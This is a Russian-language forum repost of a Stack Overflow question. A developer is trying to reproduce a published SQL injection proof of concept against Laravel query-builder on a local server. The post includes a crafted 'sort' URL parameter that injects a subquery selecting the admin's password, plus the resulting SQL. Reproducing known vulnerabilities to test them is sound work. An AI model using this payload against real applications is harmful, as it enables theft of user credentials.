Запрос Laravel не выполняется должным образом

Запрос Laravel не выполняется должным образом ⇐ Php

Ответить

1 сообщение • Страница 1 из 1

Anonymous

Запрос Laravel не выполняется должным образом

Цитата

Сообщение Anonymous » 22 июн 2024, 00:20

Я пытаюсь запустить эту проверку концепции
https://freek.dev/1317-an-important-sec ... ry-builder
Схема:

Мой код

Код: Выделить всё

    public function query_builder(Request $request){

DB::connection()->enableQueryLog();
$users = QueryBuilder::for(User::class)->select('name')
->get();
$queries = \DB::getQueryLog();

dd($queries);

return response()->json($users);
}

Я использую PHP 7.2 в Windows, и это мой URL

Код: Выделить всё

http://127.0.0.1:8080/query_builder?sort=email-%3E%22%27))%20AND%20(SELECT%20password%20FROM%20users%20WHERE%20email=%27admin@example.com%27)--

Это запрос, который выполняется

Код: Выделить всё

select `name` from `users` order by json_unquote(json_extract(`email`, '$.""\')) AND (SELECT password FROM users WHERE email=\'admin@example.com\')--"')) asc

Это результат, однако я ожидаю увидеть пароль. В чем проблема? К сожалению, то же самое выполняется в другой среде с той же конфигурацией.

Подробнее здесь: https://stackoverflow.com/questions/786 ... g-properly

1719004856

Anonymous

Я пытаюсь запустить эту проверку концепции
https://freek.dev/1317-an-important-security-release-for-laravel-query-builder
Схема: 
[img]https://i.sstatic.net/AJCHUtn8.png[/img]

Мой код
[code]    public function query_builder(Request $request){

DB::connection()->enableQueryLog();
$users = QueryBuilder::for(User::class)->select('name')
->get();
$queries = \DB::getQueryLog();

dd($queries);

return response()->json($users);
}
[/code]
Я использую PHP 7.2 в Windows, и это мой URL
[code]http://127.0.0.1:8080/query_builder?sort=email-%3E%22%27))%20AND%20(SELECT%20password%20FROM%20users%20WHERE%20email=%27admin@example.com%27)--
[/code]
Это запрос, который выполняется
[code]select `name` from `users` order by json_unquote(json_extract(`email`, '$.""\')) AND (SELECT password FROM users WHERE email=\'admin@example.com\')--"')) asc
[/code]
Это результат, однако я ожидаю увидеть пароль. В чем проблема? К сожалению, то же самое выполняется в другой среде с той же конфигурацией. 

Подробнее здесь: [url]https://stackoverflow.com/questions/78653798/laravel-query-not-executing-properly[/url]